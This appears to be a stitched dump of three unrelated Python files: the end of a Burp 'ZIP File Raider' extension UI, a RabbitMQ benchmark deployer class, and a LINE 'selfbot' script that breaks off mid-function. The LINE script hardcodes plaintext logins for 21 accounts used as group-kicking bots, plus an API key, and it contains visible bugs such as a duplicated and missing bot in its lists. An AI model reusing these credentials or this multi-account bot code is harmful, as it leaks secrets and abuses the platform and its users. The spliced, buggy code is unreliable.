self.scanBtnClear = JButton("Clear", actionPerformed = self.scanBtnClearClick)
self.scanBtnCancel = JButton("Cancel", actionPerformed = self.cancelScan)
scanBtnPanel.add(self.scanBtnGo)
scanBtnPanel.add(self.scanBtnSave)
scanBtnPanel.add(self.scanBtnClearInsertionPoint)
scanBtnPanel.add(self.scanBtnClear)
scanBtnPanel.setLayout(BoxLayout(scanBtnPanel,BoxLayout.X_AXIS))
scanPanel1.add(scanLabel1)
scanPanel1.add(scanListFileDirPane)
scanPanel2.add(self.scanLblFilename)
scanPanel2.add(self.scanEditField.getComponent())
scanPanel2.add(scanBtnPanel)
scanPanel3.add(scanLabel3)
scanPanel3.add(self.checkboxScanFilename)
scanPanel3.add(scanLabel4)
scanPanel3.add(self.scannerStatusLabel)
scanPanel3.add(self.scanBtnCancel)
self.scanBtnCancel.setEnabled(False)
scanPanel3.add(scanLabel5)
scanSplitPane.setResizeWeight(0.6)
self.tab = tabPane
# implement ITab
def getTabCaption(self):
return "ZIP File Raider"
def getUiComponent(self):
return self.tab
|
Deployer.py
|
import sys
import subprocess
import threading
import time
import uuid
import os.path
from datetime import datetime
from random import randint
from UniqueConfiguration import UniqueConfiguration
from CommonConfiguration import CommonConfiguration
from printer import console_out, console_out_exception
class Deployer:
def __init__(self):
self._deploy_status = dict()
self.actor = "DEPLOYER"
def deploy(self, runner, configurations, common_conf):
if common_conf.run_tag == "none":
common_conf.run_tag = str(randint(1, 99999))
self.parallel_deploy(configurations, common_conf)
# if common_conf.background_topology_file != "none":
# runner.run_background_load_across_runs(configurations, common_conf)
def get_deploy_status(self):
return self._deploy_status
def update_single(self, unique_conf, common_conf):
raise NotImplementedError
def deploy_single(self, unique_conf, common_conf):
raise NotImplementedError
def deploy_rabbitmq_cluster(self, unique_conf, common_conf):
raise NotImplementedError
def teardown_ec2(self, technology, node, run_tag, no_destroy):
raise NotImplementedError
def teardown_managed_k8s(self, unique_conf, no_destroy):
raise NotImplementedError
def teardown_loadgen(self, unique_conf, common_conf, no_destroy):
pass
def teardown_all(self, configurations, common_conf, no_destroy):
if no_destroy:
console_out(self.actor, "No teardown as --no-destroy set to true")
self.get_logs_of_all_configs(common_conf, configurations)
else:
console_out(self.actor, "Terminating all servers")
self.get_logs_of_all_configs(common_conf, configurations)
for config_tag in configurations:
console_out(self.actor, f"TEARDOWN FOR configuration {config_tag}")
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
if unique_conf.deployment == "ec2":
for n in range(0, unique_conf.cluster_size):
node_num = int(unique_conf.node_number) + n
console_out(self.actor, f"TEARDOWN FOR node {node_num}")
self.teardown_ec2(unique_conf.technology,
str(node_num),
common_conf.run_tag,
no_destroy)
console_out(self.actor, f"TEARDOWN FOR {unique_conf.config_tag} loadgen")
self.teardown_loadgen(unique_conf,
common_conf,
no_destroy)
elif unique_conf.deployment == "eks" or unique_conf.deployment == "gke":
self.teardown_managed_k8s(unique_conf, no_destroy)
else:
raise Exception(f"Invalid deployment type: {unique_conf.deployment}")
console_out(self.actor, "All servers terminated")
exit(1)
def get_start_end_nodes(self, configurations):
start_node = 0
last_node = 0
counter = 0
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
if counter == 0:
start_node = unique_conf.node_number
last_node = int(unique_conf.node_number) + int(unique_conf.cluster_size) - 1
counter += 1
return start_node, last_node
def get_start_end_nodes_of_config(self, unique_conf):
start_node = unique_conf.node_number
last_node = int(unique_conf.node_number) + int(unique_conf.cluster_size) - 1
return start_node, last_node
def parallel_deploy(self, configurations, common_conf):
d_threads = list()
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for i in range(len(unique_conf_list)):
unique_conf = unique_conf_list[i]
if common_conf.no_deploy:
deploy = threading.Thread(target=self.update_single, args=(unique_conf, common_conf,))
else:
deploy = threading.Thread(target=self.deploy_rabbitmq_cluster, args=(unique_conf, common_conf,))
d_threads.append(deploy)
for dt in d_threads:
dt.start()
for dt in d_threads:
dt.join()
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
status_id1 = unique_conf.technology + unique_conf.node_number
if self._deploy_status[status_id1] != "success":
console_out(self.actor, f"Deployment failed for node {unique_conf.technology}{unique_conf.node_number}")
if not common_conf.no_deploy:
self.teardown_all(configurations, common_conf, False)
def get_logs_of_all_configs(self, common_conf, configurations):
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
if unique_conf.deployment == "ec2":
try:
start_node, end_node = self.get_start_end_nodes_of_config(unique_conf)
self.get_logs(common_conf, unique_conf.logs_volume, start_node, end_node)
except Exception as e:
console_out_exception(self.actor, "Failed retrieving logs", e)
elif unique_conf.deployment == "eks" or unique_conf.deployment == "gke":
console_out(self.actor, "Log gathering not yet supported for EKS/GKE")
else:
raise Exception(f"Invalid deployment type: {unique_conf.deployment}")
def get_logs(self, common_conf, logs_volume, start_node, end_node):
raise NotImplementedError
def update_broker_config_on_all(self, configurations, common_conf, broker_config):
for config_tag in configurations:
unique_conf_list = configurations[config_tag]
for p in range(len(unique_conf_list)):
unique_conf = unique_conf_list[p]
start_node, end_node = self.get_start_end_nodes_of_config(unique_conf)
self.update_broker_config(common_conf, start_node, end_node, broker_config)
|
gg.py
|
# -*- coding: utf-8 -*-
'''
© 2018SelfBot ProtectV2.2
'''
from important import *
# Setup Argparse
parser = argparse.ArgumentParser(description='© 2018SelfBot ProtectV2.2')
parser.add_argument('-t', '--token', type=str, metavar='', required=False, help='Token | Example : Exxxx')
parser.add_argument('-e', '--email', type=str, default='', metavar='', required=False, help='Email Address | Example : example@xxx.xx')
parser.add_argument('-p', '--passwd', type=str, default='', metavar='', required=False, help='Password | Example : xxxx')
parser.add_argument('-a', '--appName', type=str, default='', metavar='', required=False, choices=list(ApplicationType._NAMES_TO_VALUES), help='Application Type | Example : CHROMEOS')
parser.add_argument('-s', '--systemname', type=str, default='', metavar='', required=False, help='System Name | Example : Chrome_OS')
parser.add_argument('-c', '--channelid', type=str, default='', metavar='', required=False, help='Channel ID | Example : 1341209950')
parser.add_argument('-T', '--traceback', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Using Traceback | Use : True/False')
parser.add_argument('-S', '--showqr', type=str2bool, nargs='?', default=False, metavar='', required=False, const=True, choices=[True, False], help='Show QR | Use : True/False')
args = parser.parse_args()
# Login line
start_runtime = datetime.now()
line = LINE("",appType="CHROMEOS")
kicker = LINE("nirassalatan1@gmail.com","what4130")
print ("===============[PRO 1 LOGIN NOSELF TOKEN]===============\n")
kicker2 = LINE("nirassalatan2@gmail.com","what4130")
print ("===============[PRO 2 LOGIN SUKSES]===============\n")
kicker3 = LINE("nirassalatan3@gmail.com","what4130")
print ("===============[PRO 3 LOGIN SUKSES]===============\n")
kicker4 = LINE("nirassalatan4@gmail.com","what4130")
print ("===============[PRO 4 LOGIN SUKSES]===============\n")
kicker5 = LINE("nirassalatan5@gmail.com","what4130")
print ("===============[PRO 5 LOGIN SUKSES]===============\n")
kicker6 = LINE("nirassalatan6@gmail.com","what4130")
print ("===============[PRO 6 LOGIN NOSELF TOKEN]===============\n")
kicker7 = LINE("nirassalatan7@gmail.com","what4130")
print ("===============[PRO 7 LOGIN SUKSES]===============\n")
kicker8 = LINE("nirassalatan8@gmail.com","what4130")
print ("===============[PRO 8 LOGIN SUKSES]===============\n")
kicker9 = LINE("nirassalatan9@gmail.com","what4130")
print ("===============[PRO 9 LOGIN SUKSES]===============\n")
kicker10 = LINE("nirassalatan10@gmail.com","what4130")
print ("===============[PRO 10 LOGIN SUKSES]===============\n")
kicker11 = LINE("zabakuno1@gmail.com","what4130")
print ("===============[PRO 11 LOGIN SUKSES]===============\n")
kicker12 = LINE("zabakuno2@gmail.com","what4130")
print ("===============[PRO 12 LOGIN SUKSES]===============\n")
kicker13 = LINE("zabakuno3@gmail.com","what4130")
print ("===============[PRO 13 LOGIN SUKSES]===============\n")
kicker14 = LINE("zabakuno4@gmail.com","what4130")
print ("===============[PRO 14 LOGIN SUKSES]===============\n")
kicker15 = LINE("zabakuno5@gmail.com","what4130")
print ("===============[PRO 15 LOGIN SUKSES]===============\n")
kicker16 = LINE("zabakuno6@gmail.com","what4130")
print ("===============[PRO 16 LOGIN SUKSES]===============\n")
kicker17 = LINE("zabakuno7@gmail.com","what4130")
print ("===============[PRO 17 LOGIN SUKSES]===============\n")
kicker18 = LINE("zabakuno8@gmail.com","what4130")
print ("===============[PRO 18 LOGIN SUKSES]===============\n")
kicker19 = LINE("zabakuno9@gmail.com","what4130")
print ("===============[PRO 19 LOGIN SUKSES]===============\n")
kicker20 = LINE("zabakuno10@gmail.com","what4130")
print ("===============[PRO 20 LOGIN SUKSES]===============\n")
g1 = LINE("dtxlcdi@it-simple.net","gaara4130")
print ("===============[PRO Ghost LOGIN SUKSES]===============\n")
client = line
myMid = line.profile.mid
creator = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
owner = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
admin = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
staff = ["u384b0bc30e28b9e7c38b9ad82a8ab9ce"]
Amid = kicker.getProfile().mid
Bmid = kicker2.getProfile().mid
Cmid = kicker3.getProfile().mid
Dmid = kicker4.getProfile().mid
Emid = kicker5.getProfile().mid
Fmid = kicker6.getProfile().mid
Gmid = kicker7.getProfile().mid
Hmid = kicker8.getProfile().mid
Imid = kicker9.getProfile().mid
Jmid = kicker10.getProfile().mid
ga1 = kicker11.getProfile().mid
ga2 = kicker12.getProfile().mid
ga3 = kicker13.getProfile().mid
ga4 = kicker14.getProfile().mid
ga5 = kicker15.getProfile().mid
ga6 = kicker16.getProfile().mid
ga7 = kicker17.getProfile().mid
ga8 = kicker18.getProfile().mid
ga9 = kicker19.getProfile().mid
ga10 = kicker20.getProfile().mid
g1MID = g1.getProfile().mid
KAC = [kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10,kicker11,kicker12,kicker13,kicker14,kicker15,kicker16,kicker17,kicker18,kicker19,kicker20]
ABC = [kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10,kicker11,kicker12,kicker13,kicker14,kicker15,kicker16,kicker17,kicker18,kicker19,kicker20]
Bots = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID]
#Autoadd
armylist = [myMid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Imid,Jmid,ga1,ga2,ga3,ga4,ga5,ga6,ga7,ga8,ga9,ga10,g1MID]
botlist = [line,kicker,kicker2,kicker3,kicker3,kicker5,kicker6,kicker7,kicker8,kicker9,kicker10,kicker11,kicker12,kicker13,kicker14,kicker15,kicker16,kicker17,kicker18,kicker19,kicker20,g1MID]
#Autoadd
Ariff = creator + admin + owner + staff + Bots
programStart = time.time()
oepoll = OEPoll(line)
tmp_text = []
lurking = {}
protectqr = []
protectkick = []
protecARoin = []
protectinvite = []
protectcancel = []
protectcanceljs = []
protectantijs = []
ghost = []
numlist= {}
zxcvzx = myMid
with open('protectcancel.json', 'r') as fp:
protectcancel = json.load(fp)
with open('protectcanceljs.json', 'r') as fp:
protectcanceljs = json.load(fp)
with open('protectantijs.json', 'r') as fp:
protectantijs = json.load(fp)
with open('ghost.json', 'r') as fp:
ghost = json.load(fp)
with open('protectinvite.json', 'r') as fp:
protectinvite = json.load(fp)
Setbot3 = codecs.open("wait.json","r","utf-8")
wait = json.load(Setbot3)
settings = livejson.File('setting.json', True, False, 4)
numlist= {}
bool_dict = {
True: ['Yes', 'Active', 'Success', 'Open', 'On'],
False: ['No', 'Not Active', 'Failed', 'Close', 'Off']
}
responsename1 = kicker.getProfile().displayName
responsename2 = kicker2.getProfile().displayName
responsename3 = kicker3.getProfile().displayName
responsename4 = kicker4.getProfile().displayName
responsename5 = kicker5.getProfile().displayName
responsename6 = kicker6.getProfile().displayName
responsename7 = kicker7.getProfile().displayName
responsename8 = kicker8.getProfile().displayName
responsename9 = kicker9.getProfile().displayName
responsename10 = kicker10.getProfile().displayName
responsename11 = kicker11.getProfile().displayName
responsename12 = kicker12.getProfile().displayName
responsename13 = kicker13.getProfile().displayName
responsename14 = kicker14.getProfile().displayName
responsename15 = kicker15.getProfile().displayName
responsename16 = kicker16.getProfile().displayName
responsename17 = kicker17.getProfile().displayName
responsename18 = kicker18.getProfile().displayName
responsename19 = kicker19.getProfile().displayName
responsename20 = kicker20.getProfile().displayName
# Backup profile
profile = line.getContact(myMid)
settings["myProfile"]["displayName"] = profile.displayName
settings["myProfile"]["statusMessage"] = profile.statusMessage
settings["myProfile"]["pictureStatus"] = profile.pictureStatus
cont = line.getContact(myMid)
settings["myProfile"]["videoProfile"] = cont.videoProfile
coverId = line.getProfileDetail()["result"]["objectId"]
settings["myProfile"]["coverId"] = coverId
def sendflex(to, data):
n1 = LiffChatContext(to)
n2 = LiffContext(chat=n1)
view = LiffViewRequest('1602687308-GXq4Vvk9', n2)
token = line.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
# Check Json Data
def delete_log():
ndt = datetime.now()
for data in msg_dict:
if (datetime.utcnow() - cTime_to_datetime(msg_dict[data]["createdTime"])) > datetime.timedelta(1):
del msg_dict[msg_id]
def restartProgram():
print ('##----- PROGRAM RESTARTED -----##')
python = sys.executable
os.execl(python, python, *sys.argv)
def logError(error, write=True):
errid = str(random.randint(100, 999))
filee = open('tmp/errors/%s.txt'%errid, 'w') if write else None
if args.traceback: traceback.print_tb(error.__traceback__)
if write:
traceback.print_tb(error.__traceback__, file=filee)
filee.close()
with open('errorLog.txt', 'a') as e:
e.write('\n%s : %s'%(errid, str(error)))
print ('++ Error : {error}'.format(error=error))
def command(text):
pesan = text.lower()
if settings['setKey']['status']:
if pesan.startswith(settings['setKey']['key']):
cmd = pesan.replace(settings['setKey']['key'],'')
else:
cmd = 'Undefined command'
else:
cmd = text.lower()
return cmd
def changeVideoAndPictureProfile(pict, vids):
try:
files = {'file': open(vids, 'rb')}
obs_params = line.genOBSParams({'oid': myMid, 'ver': '2.0', 'type': 'video', 'cat': 'vp.mp4'})
data = {'params': obs_params}
r_vp = line.server.postContent('{}/talk/vp/upload.nhn'.format(str(line.server.LINE_OBS_DOMAIN)), data=data, files=files)
if r_vp.status_code != 201:
return "Failed update profile"
line.updateProfilePicture(pict, 'vp')
return "Success update profile"
except Exception as e:
raise Exception("Error change video and picture profile {}".format(str(e)))
def genImageB64(path):
with open(path, 'rb') as img_file:
encode_str = img_file.read()
b64img = base64.b64encode(encode_str)
return b64img.decode('utf-8')
def genUrlB64(url):
return base64.b64encode(url.encode('utf-8')).decode('utf-8')
def removeCmd(text, key=''):
if key == '':
setKey = '' if not settings['setKey']['status'] else settings['setKey']['key']
else:
setKey = key
text_ = text[len(setKey):]
sep = text_.split(' ')
return text_[len(sep[0] + ' '):]
def multiCommand(cmd, list_cmd=[]):
if True in [cmd.startswith(c) for c in list_cmd]:
return True
else:
return False
def replaceAll(text, dic):
try:
rep_this = dic.items()
except:
rep_this = dic.iteritems()
for i, j in rep_this:
text = text.replace(i, j)
return text
def help():
key = '' if not settings['setKey']['status'] else settings['setKey']['key']
with open('help.txt', 'r') as f:
text = f.read()
helpMsg = text.format(key=key.title())
return helpMsg
def helpbot():
with open('helpbot.txt', 'r') as f:
text = f.read()
helpMsg1 = text.format()
return helpMsg1
def parsingRes(res):
result = ''
textt = res.split('\n')
for text in textt:
if True not in [text.startswith(s) for s in ['╭', '├', '│', '╰']]:
result += '\n│ ' + text
else:
if text == textt[0]:
result += text
else:
result += '\n' + text
return result
def sendMentionxd(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
line.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
line.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def Musik(to):
contentMetadata={'previewUrl': "http://dl.profile.line-cdn.net/"+line.getContact(myMid).picturePath, 'i-installUrl': 'http://itunes.apple.com/app/linemusic/id966142320', 'type': 'mt', 'subText': line.getContact(myMid).statusMessage if line.getContact(myMid).statusMessage != '' else 'creator By rat |ID LINE|\njamekillover', 'a-installUrl': 'market://details?id=jp.linecorp.linemusic.android', 'a-packageName': 'jp.linecorp.linemusic.android', 'countryCode': 'JP', 'a-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1', 'i-linkUri': 'linemusic://open?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1', 'text': line.getContact(myMid).displayName, 'id': 'mt000000000d69e2db', 'linkUri': 'https://music.me.me/launch?target=track&item=mb00000000016197ea&subitem=mt000000000d69e2db&cc=JP&from=lc&v=1','MSG_SENDER_ICON': "https://os.me.naver.jp/os/p/"+myMid,'MSG_SENDER_NAME': line.getContact(myMid).displayName,}
return line.sendMessage(to, line.getContact(myMid).displayName, contentMetadata, 19)
def sendMention1(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention2(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker2.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker2.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention3(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker3.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker3.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention4(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker4.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker4.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention5(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker5.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker5.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention6(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker6.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker6.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention7(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker7.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker7.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention8(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker8.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker8.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention9(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker9.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker9.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention10(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker10.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker10.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention11(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker11.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker11.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention12(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker12.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker12.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention13(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker13.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker13.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention14(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker14.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker14.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention15(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker15.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker15.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention16(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker16.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker16.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention17(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker17.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker17.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention18(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker18.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker18.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention19(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker19.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker19.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def sendMention20(to, mid, firstmessage, lastmessage):
try:
arrData = ""
text = "%s " %(str(firstmessage))
arr = []
mention = "@x "
slen = str(len(text))
elen = str(len(text) + len(mention) - 1)
arrData = {'S':slen, 'E':elen, 'M':mid}
arr.append(arrData)
text += mention + str(lastmessage)
kicker20.sendMessage(to, text, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
except Exception as error:
kicker20.sendMessage(to, "[ INFO ] Error :\n" + str(error))
def cloneProfile(myMid):
contact = line.getContact(myMid)
if contact.videoProfile == None:
line.cloneContactProfilev2(myMid)
else:
profile = line.getProfile()
profile.displayName, profile.statusMessage = contact.displayName, contact.statusMessage
line.updateProfile(profile)
pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + contact.pictureStatus, saveAs="tmp/pict.bin")
vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + contact.pictureStatus + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = line.getProfileDetail(myMid)['result']['objectId']
line.updateProfileCoverById(coverId)
def backupProfile():
profile = line.getContact(myMid)
settings['myProfile']['displayName'] = profile.displayName
settings['myProfile']['pictureStatus'] = profile.pictureStatus
settings['myProfile']['statusMessage'] = profile.statusMessage
settings['myProfile']['videoProfile'] = profile.videoProfile
coverId = line.getProfileDetail()['result']['objectId']
settings['myProfile']['coverId'] = str(coverId)
def sendTemplate(to, data):
line = LiffChatContext(to)
ratedit = LiffContext(chat=line)
view = LiffViewRequest('1602687308-GXq4Vvk9', ratedit)
token = line.liff.issueLiffView(view)
url = 'https://api.line.me/message/v3/share'
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer %s' % token.accessToken
}
data = {"messages":[data]}
requests.post(url, headers=headers, data=json.dumps(data))
def restoreProfile():
profile = line.getProfile()
profile.displayName = settings['myProfile']['displayName']
profile.statusMessage = settings['myProfile']['statusMessage']
if settings['myProfile']['videoProfile'] == None:
profile.pictureStatus = line.downloadFileURL("http://dl.profile.line-cdn.net/{}".format(settings["myProfile"]["pictureStatus"]), saveAs="tmp/backupPicture.bin")
line.updateProfilePicture(profile.pictureStatus)
line.updateProfile(profile)
else:
line.updateProfile(profile)
pict = line.downloadFileURL('http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'], saveAs="tmp/pict.bin")
vids = line.downloadFileURL( 'http://dl.profile.line-cdn.net/' + settings['myProfile']['pictureStatus'] + '/vp', saveAs="tmp/video.bin")
changeVideoAndPictureProfile(pict, vids)
coverId = settings['myProfile']['coverId']
line.updateProfileCoverById(coverId)
def time_converter(time):
converted_time = datetime.fromtimestamp(
int(time)
).strftime('%I:%M %p')
return converted_time
def url_builder(city_id):
user_api = '6975b23cef6c84e7f26062ef1c913c0d' # Obtain yours form: http://openweathermap.org/
unit = 'metric' # For Fahrenheit use imperial, for Celsius use metric, and the default is Kelvin.
